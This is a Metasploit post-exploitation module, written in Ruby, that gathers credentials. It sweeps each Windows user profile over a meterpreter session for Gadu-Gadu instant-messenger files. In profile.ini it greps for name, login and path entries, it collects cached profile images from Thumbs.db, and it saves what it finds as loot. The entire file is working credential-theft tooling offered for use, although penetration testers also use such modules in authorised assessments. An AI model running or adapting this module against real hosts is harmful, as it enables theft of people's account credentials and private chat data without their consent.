##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post-exploitation gatherer for Gadu-Gadu artifacts in Windows user profiles.
#
# The class itself does no file access: it declares WHAT to look for
# (ARTIFACTS) and which options the operator can tune, then delegates the
# sweep to Msf::Post::Windows::Packrat#run_packrat once per profile returned
# by Msf::Post::Windows::UserProfiles#grab_user_profiles.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::Windows::Packrat

  # Packrat artifact definition. Two files are described:
  #   * Thumbs.db  (path 'GG dysk', dir 'Galeria') - cached profile images,
  #     collected as a binary ('image') artifact.
  #   * profile.ini (path 'AppData', dir 'GG')     - text artifact that is
  #     additionally searched with the regexes under :regex_search.
  # How Packrat resolves path/dir against a profile lives outside this file.
  # Each regex is an (?i-mx:...) group: case-insensitive, with "." not
  # crossing newlines, so every pattern matches one key=value line.
  # NOTE: Hash#freeze is shallow - the nested hashes and arrays stay mutable.
  ARTIFACTS = {
    application: 'gadugadu',
    app_category: 'chats',
    gatherable_artifacts: [
      {
        filetypes: 'chat_logs',
        path: 'GG dysk',
        dir: 'Galeria',
        artifact_file_name: 'Thumbs.db',
        description: 'Saved GaduGadu User Profile Images in Thumbs.db file',
        credential_type: 'image'
      },
      {
        filetypes: 'chat_logs',
        path: 'AppData',
        dir: 'GG',
        artifact_file_name: 'profile.ini',
        description: 'GaduGadu profile User information : Rename long saved artifactto in profile.ini',
        credential_type: 'text',
        regex_search: [
          {
            extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
            extraction_type: 'credentials',
            regex: [
              '(?i-mx:name=.*)',
              '(?i-mx:login=.*)',
              '(?i-mx:path=.*)'
            ]
          }
        ]
      }
    ]
  }.freeze

  # Registers module metadata and the operator-facing options.
  #
  # @param info [Hash] metadata merged by update_info (Metasploit convention)
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Gadugadu Credential Gatherer',
        'Description' => %q{
          This module searches for Gadugadu credentials on a Windows host. Gadu-Gadu is a Polish instant messaging client using a proprietary protocol. Gadu-Gadu was the most popular IM service in Poland.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Kazuyoshi Maruta',
          'Daniel Hallsworth',
          'Barwar Salim M',
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    register_options(
      [
        # '^' is a line anchor in Ruby, so the default matches any line
        # beginning with "password".
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
        # choices are derived from the ARTIFACTS constant above
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', artifact_type_choices])
      ]
    )
  end

  # Module entry point: echoes the selected options, then runs one Packrat
  # sweep per user profile found on the host.
  def run
    print_selections

    grab_user_profiles.each { |userprofile| run_packrat(userprofile, ARTIFACTS) }

    print_status('PackRat credential sweep completed')
  end

  private

  # Values offered by the ARTIFACTS option: 'All' followed by every distinct
  # +filetypes+ value declared in ARTIFACTS (currently only 'chat_logs').
  #
  # @return [Array<String>]
  def artifact_type_choices
    types = ARTIFACTS[:gatherable_artifacts].map { |artifact| artifact[:filetypes] }
    types.uniq.unshift('All')
  end

  # Prints the three datastore selections that drive the sweep.
  def print_selections
    print_status('Filtering based on these selections: ')
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")
  end
end